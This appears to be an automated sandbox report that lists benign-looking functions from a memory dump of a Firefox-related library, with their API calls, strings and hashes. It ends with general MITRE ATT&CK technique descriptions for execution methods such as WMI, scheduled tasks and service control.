Source File: 00000009.00000002.2718249908.00000000665D1000.00000020.00000001.01000000.00000023.sdmp, Offset: 665D0000, based on PE: true

Associated: 00000009.00000002.2717940466.00000000665D0000.00000002.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2718939776.000000006664D000.00000002.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2718982563.000000006665E000.00000004.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2719016597.0000000066662000.00000002.00000001.01000000.00000023.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_665d0000_Lbg6Jgx2PuK0JimgGIFCI5UU.jbxd

Similarity

API ID: moz_xmalloc$malloc
String ID: 0Kaf
API String ID: 1967447596-1972886295
Opcode ID: 26e400adbc4dd1962c0462c652a8f496a88607757228c19233f06711ec6135b5
Instruction ID: ed3b78feb58e0d215b354238550f7223f42e66b35312e3c4189ca6c69a9e5d74
Opcode Fuzzy Hash: 26e400adbc4dd1962c0462c652a8f496a88607757228c19233f06711ec6135b5
Instruction Fuzzy Hash: E4E086F1B507054AEF08CD7A9C0B52E79C88B646E97044935E93AC62C8FB54E9508191

Function 66635900 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 22COMMON

Download Yara Rule

APIs

SetEnvironmentVariableW.KERNEL32(MOZ_SKELETON_UI_RESTARTING,666551C8), ref: 6663591A
CloseHandle.KERNEL32(FFFFFFFF), ref: 6663592B

Strings

MOZ_SKELETON_UI_RESTARTING, xrefs: 66635915

Memory Dump Source

Source File: 00000009.00000002.2718249908.00000000665D1000.00000020.00000001.01000000.00000023.sdmp, Offset: 665D0000, based on PE: true

Associated: 00000009.00000002.2717940466.00000000665D0000.00000002.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2718939776.000000006664D000.00000002.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2718982563.000000006665E000.00000004.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2719016597.0000000066662000.00000002.00000001.01000000.00000023.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_665d0000_Lbg6Jgx2PuK0JimgGIFCI5UU.jbxd

Similarity

API ID: CloseEnvironmentHandleVariable
String ID: MOZ_SKELETON_UI_RESTARTING
API String ID: 297244470-335682676
Opcode ID: 95abc5816cf8b9d525fb0d60884c3768e52e78e726fc146f7782fb2b85b56ef4
Instruction ID: e7069d76d8441b35e9dd028407bfe9b444de0196a09e0526111a68ed0cd0022a
Opcode Fuzzy Hash: 95abc5816cf8b9d525fb0d60884c3768e52e78e726fc146f7782fb2b85b56ef4
Instruction Fuzzy Hash: 37E0DF700042E0FBDB018F6AF90E7457FEB9B53369F048144E6ACA36C1C3B1A840C791

Function 665E3850 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 21COMMON

Download Yara Rule

APIs

AcquireSRWLockExclusive.KERNEL32(6665F860), ref: 665E385C
ReleaseSRWLockExclusive.KERNEL32(6665F860,?), ref: 665E3871

Strings

,ef, xrefs: 665E387A

Memory Dump Source

Source File: 00000009.00000002.2718249908.00000000665D1000.00000020.00000001.01000000.00000023.sdmp, Offset: 665D0000, based on PE: true

Associated: 00000009.00000002.2717940466.00000000665D0000.00000002.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2718939776.000000006664D000.00000002.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2718982563.000000006665E000.00000004.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2719016597.0000000066662000.00000002.00000001.01000000.00000023.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_665d0000_Lbg6Jgx2PuK0JimgGIFCI5UU.jbxd

Similarity

API ID: ExclusiveLock$AcquireRelease
String ID: ,ef
API String ID: 17069307-1608801504
Opcode ID: b4ff416cd843b53cf51a1e72b5412d9fa70a4544d2b47ab8e39826026c50d40f
Instruction ID: 8c388e1842356109f93ec1abc51115abf7a6879300c9a98efe72cbcf0c910f73
Opcode Fuzzy Hash: b4ff416cd843b53cf51a1e72b5412d9fa70a4544d2b47ab8e39826026c50d40f
Instruction Fuzzy Hash: A0E0DF3281AA29A78F02DF97B80354A3F7BEED37903064005F60A97210C730A8808ACA

Function 665EBED0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15librarythreadCOMMON

Download Yara Rule

APIs

DisableThreadLibraryCalls.KERNEL32(?), ref: 665EBEE3
LoadLibraryExW.KERNEL32(cryptbase.dll,00000000,00000800), ref: 665EBEF5

Strings

cryptbase.dll, xrefs: 665EBEF0

Memory Dump Source

Source File: 00000009.00000002.2718249908.00000000665D1000.00000020.00000001.01000000.00000023.sdmp, Offset: 665D0000, based on PE: true

Associated: 00000009.00000002.2717940466.00000000665D0000.00000002.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2718939776.000000006664D000.00000002.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2718982563.000000006665E000.00000004.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2719016597.0000000066662000.00000002.00000001.01000000.00000023.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_665d0000_Lbg6Jgx2PuK0JimgGIFCI5UU.jbxd

Similarity

API ID: Library$CallsDisableLoadThread
String ID: cryptbase.dll
API String ID: 4137859361-1262567842
Opcode ID: f4dc1c344c48ce3ad2c612d433da44603a410aa996db536a68cfce26b34babec
Instruction ID: 92d5cc92e06bb106da8a09095170920e8957b9bcd793424f9fe9a7a576563a22
Opcode Fuzzy Hash: f4dc1c344c48ce3ad2c612d433da44603a410aa996db536a68cfce26b34babec
Instruction Fuzzy Hash: 20D0A932084789EADB00FAA1AE0BB293BAAA702362F0080A0F30584152C7B1A420CF84

Function 665D50E0 Relevance: 5.2, APIs: 4, Instructions: 213COMMON

Download Yara Rule

APIs

memcpy.VCRUNTIME140(036477E8,?,?,?,?,?,?,?,665D4E9C,?,?,?,?,?), ref: 665D510A
memcpy.VCRUNTIME140(036477E8,?,?,?,?,?,?,?,665D4E9C,?,?,?,?,?), ref: 665D5167
memcpy.VCRUNTIME140(036477E8,?,?,?,?,?), ref: 665D5196
memcpy.VCRUNTIME140(036477E8,?,?,?,?,?,?,?,665D4E9C), ref: 665D5234

Memory Dump Source

Source File: 00000009.00000002.2718249908.00000000665D1000.00000020.00000001.01000000.00000023.sdmp, Offset: 665D0000, based on PE: true

Associated: 00000009.00000002.2717940466.00000000665D0000.00000002.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2718939776.000000006664D000.00000002.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2718982563.000000006665E000.00000004.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2719016597.0000000066662000.00000002.00000001.01000000.00000023.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_665d0000_Lbg6Jgx2PuK0JimgGIFCI5UU.jbxd

Similarity

API ID: memcpy
String ID:
API String ID: 3510742995-0
Opcode ID: 933be0c35787ef1d59b8af2b73a0f28f4363cc6c90fe8bc4464883a815d3fd0d
Instruction ID: 33ca6546e5aea9b02e281908f1dd0ce5bc9547db557ec6a0128c57b9fa4f473e
Opcode Fuzzy Hash: 933be0c35787ef1d59b8af2b73a0f28f4363cc6c90fe8bc4464883a815d3fd0d
Instruction Fuzzy Hash: AC91AD35904616CFCB15CF0CC891A5ABBA2FF99318B188588EC999B355D772FC46CBE0

Function 666108F0 Relevance: 5.2, APIs: 4, Instructions: 165COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(6665E7DC), ref: 66610918
LeaveCriticalSection.KERNEL32(6665E7DC), ref: 666109A6
EnterCriticalSection.KERNEL32(6665E7DC,?,00000000), ref: 666109F3
LeaveCriticalSection.KERNEL32(6665E7DC), ref: 66610ACB

Memory Dump Source

Source File: 00000009.00000002.2718249908.00000000665D1000.00000020.00000001.01000000.00000023.sdmp, Offset: 665D0000, based on PE: true

Associated: 00000009.00000002.2717940466.00000000665D0000.00000002.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2718939776.000000006664D000.00000002.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2718982563.000000006665E000.00000004.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2719016597.0000000066662000.00000002.00000001.01000000.00000023.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_665d0000_Lbg6Jgx2PuK0JimgGIFCI5UU.jbxd

Similarity

API ID: CriticalSection$EnterLeave
String ID:
API String ID: 3168844106-0
Opcode ID: 983d4dfb62d576fd1bc2ab3d4d00c5ebd3aaa15b836b86c14604d58e02998218
Instruction ID: 510e2d185404f84b6333130bc832e96843d888cacd487c2684e4da417eaca898
Opcode Fuzzy Hash: 983d4dfb62d576fd1bc2ab3d4d00c5ebd3aaa15b836b86c14604d58e02998218
Instruction Fuzzy Hash: EB512736B086649BEF08DE2EF821625B3A7EBC2B207154579DA6597781DF30FC21C6C1

Function 666359C0 Relevance: 5.2, APIs: 4, Instructions: 155COMMON

Download Yara Rule

APIs

malloc.MOZGLUE(?,?,?,?,?,?,?,?,00000008,?,6660E56A,?,|UrlbarCSSSpan,0000000E,?), ref: 66635A47
memset.VCRUNTIME140(00000000,00000000,?,?,?,?,?,?,?,?,?,00000008,?,6660E56A,?,|UrlbarCSSSpan), ref: 66635A5C
free.MOZGLUE(?), ref: 66635A97
free.API-MS-WIN-CRT-HEAP-L1-1-0(00000010), ref: 66635B9D

Memory Dump Source

Source File: 00000009.00000002.2718249908.00000000665D1000.00000020.00000001.01000000.00000023.sdmp, Offset: 665D0000, based on PE: true

Associated: 00000009.00000002.2717940466.00000000665D0000.00000002.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2718939776.000000006664D000.00000002.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2718982563.000000006665E000.00000004.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2719016597.0000000066662000.00000002.00000001.01000000.00000023.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_665d0000_Lbg6Jgx2PuK0JimgGIFCI5UU.jbxd

Similarity

API ID: free$mallocmemset
String ID:
API String ID: 2682772760-0
Opcode ID: 8b1f24cab7259d56b08b436fe0b62d0b1e4c08162faf2fd0f49eb1ccf1d81255
Instruction ID: 3ca8243b9a0153162310b999c4a583460b118de6d00ada54c5bad9f101df2ea8
Opcode Fuzzy Hash: 8b1f24cab7259d56b08b436fe0b62d0b1e4c08162faf2fd0f49eb1ccf1d81255
Instruction Fuzzy Hash: D8516D709087509FE700CF29D8C061BBBE5FF9A318F04C96DE889AB246D775D944CBA2

Function 6662B5C0 Relevance: 5.1, APIs: 4, Instructions: 145COMMON

Download Yara Rule

APIs

malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,6662B3D7,?,00000000,?,?,?,?,?,?,?,?,?,?,6662AE52), ref: 6662B628

Part of subcall function 666290E0: free.MOZGLUE(?,00000000,?,?,6662DEDB), ref: 666290FF
Part of subcall function 666290E0: free.MOZGLUE(?,00000000,?,?,6662DEDB), ref: 66629108

malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000008,?,6662B3D7,?,00000000,?,?,?,?,?,?,?,?,?,?,6662AE52), ref: 6662B67D
malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000008,?,6662B3D7,?,00000000,?,?,?,?,?,?,?,?,?,?,6662AE52), ref: 6662B708
free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6662B74D

Memory Dump Source

Source File: 00000009.00000002.2718249908.00000000665D1000.00000020.00000001.01000000.00000023.sdmp, Offset: 665D0000, based on PE: true

Associated: 00000009.00000002.2717940466.00000000665D0000.00000002.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2718939776.000000006664D000.00000002.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2718982563.000000006665E000.00000004.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2719016597.0000000066662000.00000002.00000001.01000000.00000023.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_665d0000_Lbg6Jgx2PuK0JimgGIFCI5UU.jbxd

Similarity

API ID: freemalloc
String ID:
API String ID: 3061335427-0
Opcode ID: 5ed87ed1af9b8f76420a4bd65ffb33b780973539046a058e1c2ef3f2bbb493b8
Instruction ID: 28efabb0de21fd9ae131707ada5dfe5ce8989569120a85ebf71351e70ab39633
Opcode Fuzzy Hash: 5ed87ed1af9b8f76420a4bd65ffb33b780973539046a058e1c2ef3f2bbb493b8
Instruction Fuzzy Hash: 0F51B0B1A042168FEB14CF19E9807AEB7B9FF85309F45852DC85AAB310D731B814CFA1

Function 665E23D8 Relevance: 5.1, APIs: 4, Instructions: 143COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2718249908.00000000665D1000.00000020.00000001.01000000.00000023.sdmp, Offset: 665D0000, based on PE: true

Associated: 00000009.00000002.2717940466.00000000665D0000.00000002.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2718939776.000000006664D000.00000002.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2718982563.000000006665E000.00000004.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2719016597.0000000066662000.00000002.00000001.01000000.00000023.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_665d0000_Lbg6Jgx2PuK0JimgGIFCI5UU.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f3d3c2829e16309ee58a6ae03195a79c16c7a37145132e3e09a6565ee07498d0
Instruction ID: a658e0755159957f7f02f11c06b8d3adf425e32263affb465564ad32b2d75e9a
Opcode Fuzzy Hash: f3d3c2829e16309ee58a6ae03195a79c16c7a37145132e3e09a6565ee07498d0
Instruction Fuzzy Hash: 8A518BB1A00207CFEB04CF58C991B9ABBB1BF48314F55826AD9199B385D771E891CFD0

Function 6662DF90 Relevance: 5.1, APIs: 4, Instructions: 136COMMON

Download Yara Rule

APIs

malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000001,?,6661FF2A), ref: 6662DFFD

Part of subcall function 666290E0: free.MOZGLUE(?,00000000,?,?,6662DEDB), ref: 666290FF
Part of subcall function 666290E0: free.MOZGLUE(?,00000000,?,?,6662DEDB), ref: 66629108

malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000004,?,6661FF2A), ref: 6662E04A
malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000004,?,6661FF2A), ref: 6662E0C0
free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,?,6661FF2A), ref: 6662E0FE

Memory Dump Source

Source File: 00000009.00000002.2718249908.00000000665D1000.00000020.00000001.01000000.00000023.sdmp, Offset: 665D0000, based on PE: true

Associated: 00000009.00000002.2717940466.00000000665D0000.00000002.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2718939776.000000006664D000.00000002.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2718982563.000000006665E000.00000004.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2719016597.0000000066662000.00000002.00000001.01000000.00000023.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_665d0000_Lbg6Jgx2PuK0JimgGIFCI5UU.jbxd

Similarity

API ID: freemalloc
String ID:
API String ID: 3061335427-0
Opcode ID: 4062d9faf196dee26828bc3f2215264e414934cc30d159b4e34086d2097d4e64
Instruction ID: fdc9c6d7cf5e73468732af53d288df3c40f949dd1ac04c2d2e245002ed452b3f
Opcode Fuzzy Hash: 4062d9faf196dee26828bc3f2215264e414934cc30d159b4e34086d2097d4e64
Instruction Fuzzy Hash: 8D41F2B1A002568FEB14CF78E88175A77AABB85304F14093DC616DB340EB32E821CFD2

Function 66636180 Relevance: 5.1, APIs: 4, Instructions: 107COMMON

Download Yara Rule

APIs

malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000024), ref: 666361DD
memcpy.VCRUNTIME140(00000000,00000024,-00000070), ref: 6663622C
malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000001), ref: 66636250
free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 66636292

Memory Dump Source

Source File: 00000009.00000002.2718249908.00000000665D1000.00000020.00000001.01000000.00000023.sdmp, Offset: 665D0000, based on PE: true

Associated: 00000009.00000002.2717940466.00000000665D0000.00000002.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2718939776.000000006664D000.00000002.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2718982563.000000006665E000.00000004.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2719016597.0000000066662000.00000002.00000001.01000000.00000023.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_665d0000_Lbg6Jgx2PuK0JimgGIFCI5UU.jbxd

Similarity

API ID: malloc$freememcpy
String ID:
API String ID: 4259248891-0
Opcode ID: 9849a4728558b86fd4b2f852f6145c52a3347ab914e8749e852beed258920970
Instruction ID: 198835909a02e0e5faac3e5dea31dd101af43eed6c4ecbde2accd9fb44c7c281
Opcode Fuzzy Hash: 9849a4728558b86fd4b2f852f6145c52a3347ab914e8749e852beed258920970
Instruction Fuzzy Hash: 1F310871A0061A8FDB04CF2DEC81A6A73EAFF95304F114539C55AD7251EB31E558C760

Function 66626E50 Relevance: 5.1, APIs: 4, Instructions: 106COMMON

Download Yara Rule

APIs

malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000018), ref: 66626EAB
memcpy.VCRUNTIME140(00000000,00000018,-000000A0), ref: 66626EFA
malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000001), ref: 66626F1E
free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 66626F5C

Memory Dump Source

Source File: 00000009.00000002.2718249908.00000000665D1000.00000020.00000001.01000000.00000023.sdmp, Offset: 665D0000, based on PE: true

Associated: 00000009.00000002.2717940466.00000000665D0000.00000002.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2718939776.000000006664D000.00000002.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2718982563.000000006665E000.00000004.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2719016597.0000000066662000.00000002.00000001.01000000.00000023.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_665d0000_Lbg6Jgx2PuK0JimgGIFCI5UU.jbxd

Similarity

API ID: malloc$freememcpy
String ID:
API String ID: 4259248891-0
Opcode ID: b9ae734c05ce204f41b4500ea89647dae32cd0de1f2245c95b7f39f0006648b8
Instruction ID: c8cd3d537de833ec48e885061fb343f282bac25de90068c7bb4923c46864dc8e
Opcode Fuzzy Hash: b9ae734c05ce204f41b4500ea89647dae32cd0de1f2245c95b7f39f0006648b8
Instruction Fuzzy Hash: FC310771A0060A8FDB04CF2DED816AB73EAEBC4300F50813DD41AC7251EB31E555CB91

Function 6663B580 Relevance: 5.1, APIs: 4, Instructions: 102COMMON

Download Yara Rule

APIs

malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,665E0A4D), ref: 6663B5EA
malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000020,?,665E0A4D), ref: 6663B623
malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000008,?,665E0A4D), ref: 6663B66C
free.API-MS-WIN-CRT-HEAP-L1-1-0(00000002,?,?,665E0A4D), ref: 6663B67F

Memory Dump Source

Source File: 00000009.00000002.2718249908.00000000665D1000.00000020.00000001.01000000.00000023.sdmp, Offset: 665D0000, based on PE: true

Associated: 00000009.00000002.2717940466.00000000665D0000.00000002.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2718939776.000000006664D000.00000002.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2718982563.000000006665E000.00000004.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2719016597.0000000066662000.00000002.00000001.01000000.00000023.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_665d0000_Lbg6Jgx2PuK0JimgGIFCI5UU.jbxd

Similarity

API ID: malloc$free
String ID:
API String ID: 1480856625-0
Opcode ID: 3a33309fd613c9393e6b7b405f4bff8da931c4e4a2ded88603c9cea1bc919f82
Instruction ID: 7fc1b28a896d64b836c54fa2955112f9bc14c0711d04d1ccf7d42018762347c4
Opcode Fuzzy Hash: 3a33309fd613c9393e6b7b405f4bff8da931c4e4a2ded88603c9cea1bc919f82
Instruction Fuzzy Hash: 3C31D6B1D006258FEB10CF5ADC4565ABBA6FFD2310F16856AC806AB202DB31E915CBE1

Function 665EBBE0 Relevance: 5.1, APIs: 4, Instructions: 96COMMON

Download Yara Rule

APIs

malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000010,?,?,?,?,?,?,?,?,?,?,?,?,?,00000008), ref: 665EBBF4
malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000001,?,?,?,?,?,?,?,?,?,?,?,?,?,00000008), ref: 665EBC66
free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000008), ref: 665EBC96
memcpy.VCRUNTIME140(00000000,00000010,0000001F,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 665EBCCE

Memory Dump Source

Source File: 00000009.00000002.2718249908.00000000665D1000.00000020.00000001.01000000.00000023.sdmp, Offset: 665D0000, based on PE: true

Associated: 00000009.00000002.2717940466.00000000665D0000.00000002.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2718939776.000000006664D000.00000002.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2718982563.000000006665E000.00000004.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2719016597.0000000066662000.00000002.00000001.01000000.00000023.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_665d0000_Lbg6Jgx2PuK0JimgGIFCI5UU.jbxd

Similarity

API ID: malloc$freememcpy
String ID:
API String ID: 4259248891-0
Opcode ID: 855590e9853a43af75e7bf9c923ba756f359544a47d3502ecd5c42354e8d4e40
Instruction ID: d2fc42be2facf1945aeac5c6b500e3ac01c77488c483542dc54be8cf15c2eeb3
Opcode Fuzzy Hash: 855590e9853a43af75e7bf9c923ba756f359544a47d3502ecd5c42354e8d4e40
Instruction Fuzzy Hash: 962134B1F083064BFB009E399D8622E72EAEB91305F144939D95FD6351EE71E584C6A1

Function 6660F5A0 Relevance: 5.1, APIs: 4, Instructions: 88COMMON

Download Yara Rule

APIs

memcpy.VCRUNTIME140(?,?,00010000), ref: 6660F611
memcpy.VCRUNTIME140(?,?,?), ref: 6660F623
memcpy.VCRUNTIME140(?,?,00010000), ref: 6660F652
memcpy.VCRUNTIME140(?,?,?), ref: 6660F668

Memory Dump Source

Source File: 00000009.00000002.2718249908.00000000665D1000.00000020.00000001.01000000.00000023.sdmp, Offset: 665D0000, based on PE: true

Associated: 00000009.00000002.2717940466.00000000665D0000.00000002.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2718939776.000000006664D000.00000002.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2718982563.000000006665E000.00000004.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2719016597.0000000066662000.00000002.00000001.01000000.00000023.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_665d0000_Lbg6Jgx2PuK0JimgGIFCI5UU.jbxd

Similarity

API ID: memcpy
String ID:
API String ID: 3510742995-0
Opcode ID: cd72a4b24c16f126375525e6a79600fc7eb806012afa7aeaa1976f5403f08771
Instruction ID: b64075e400fdee0fc4fc4fdfe24f4b024f671d235f2179d85a3f52b44e00ff67
Opcode Fuzzy Hash: cd72a4b24c16f126375525e6a79600fc7eb806012afa7aeaa1976f5403f08771
Instruction Fuzzy Hash: F7318F71A00614AFC719CF1DEDC0A9B7BB5EBD4344B14C938FA4A8B704D632E8448B98

Function 665EB940 Relevance: 5.1, APIs: 4, Instructions: 64COMMON

Download Yara Rule

APIs

memcpy.VCRUNTIME140(?,?,?), ref: 665EB96F
malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000020), ref: 665EB99A
memcpy.VCRUNTIME140(00000000,?,?), ref: 665EB9B0
free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 665EB9B9

Memory Dump Source

Source File: 00000009.00000002.2718249908.00000000665D1000.00000020.00000001.01000000.00000023.sdmp, Offset: 665D0000, based on PE: true

Associated: 00000009.00000002.2717940466.00000000665D0000.00000002.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2718939776.000000006664D000.00000002.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2718982563.000000006665E000.00000004.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2719016597.0000000066662000.00000002.00000001.01000000.00000023.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_665d0000_Lbg6Jgx2PuK0JimgGIFCI5UU.jbxd

Similarity

API ID: memcpy$freemalloc
String ID:
API String ID: 3313557100-0
Opcode ID: f6e4ae05373d2930aca3d3de0c386501205d55b19f31bf029590861a1e13e038
Instruction ID: 939b34996c22703a975faa7b05371298f33eeabd3f391f9054a3585e1aadef86
Opcode Fuzzy Hash: f6e4ae05373d2930aca3d3de0c386501205d55b19f31bf029590861a1e13e038
Instruction Fuzzy Hash: 7A117FB1E003059FCB04DF69DC818ABBBF9BF98214B14893AE91AD3301D731A915CAA0

Function 666226B0 Relevance: 5.0, APIs: 4, Instructions: 45COMMON

Download Yara Rule

APIs

free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 666226C1
free.MOZGLUE(?), ref: 666226E4
free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 666226FF
free.MOZGLUE ref: 6662270D

Memory Dump Source

Source File: 00000009.00000002.2718249908.00000000665D1000.00000020.00000001.01000000.00000023.sdmp, Offset: 665D0000, based on PE: true

Associated: 00000009.00000002.2717940466.00000000665D0000.00000002.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2718939776.000000006664D000.00000002.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2718982563.000000006665E000.00000004.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2719016597.0000000066662000.00000002.00000001.01000000.00000023.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_665d0000_Lbg6Jgx2PuK0JimgGIFCI5UU.jbxd

Similarity

API ID: free
String ID:
API String ID: 1294909896-0
Opcode ID: e8008b3a621ca76eca9b7ce8bdba1270d1a2de9a6c913c653576778baa2bcef7
Instruction ID: fd01dd5e1ded6aab190a18a92eedf84c8f726b3be44deea27c6d39062b6a8b99
Opcode Fuzzy Hash: e8008b3a621ca76eca9b7ce8bdba1270d1a2de9a6c913c653576778baa2bcef7
Instruction Fuzzy Hash: 2BF0A4B2A102015BEB008E19FCC5A5BB7AEEF91258B544035EA1AD3301E732F955CAA2

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically may require being a member of an admin or otherwise privileged group on the remote system.
Tactics:	Execution, Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Container: Container Creation, File: File Creation, File: File Modification, Process: Process Creation, Scheduled Job: Scheduled Job Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse the Windows service control manager to execute malicious commands or payloads. The Windows service control manager ( `services.exe` ) is an interface to manage and manipulate services.The service control manager is accessible to users via GUI components as well as system utilities such as `sc.exe` and Net .
Tactics:	Execution
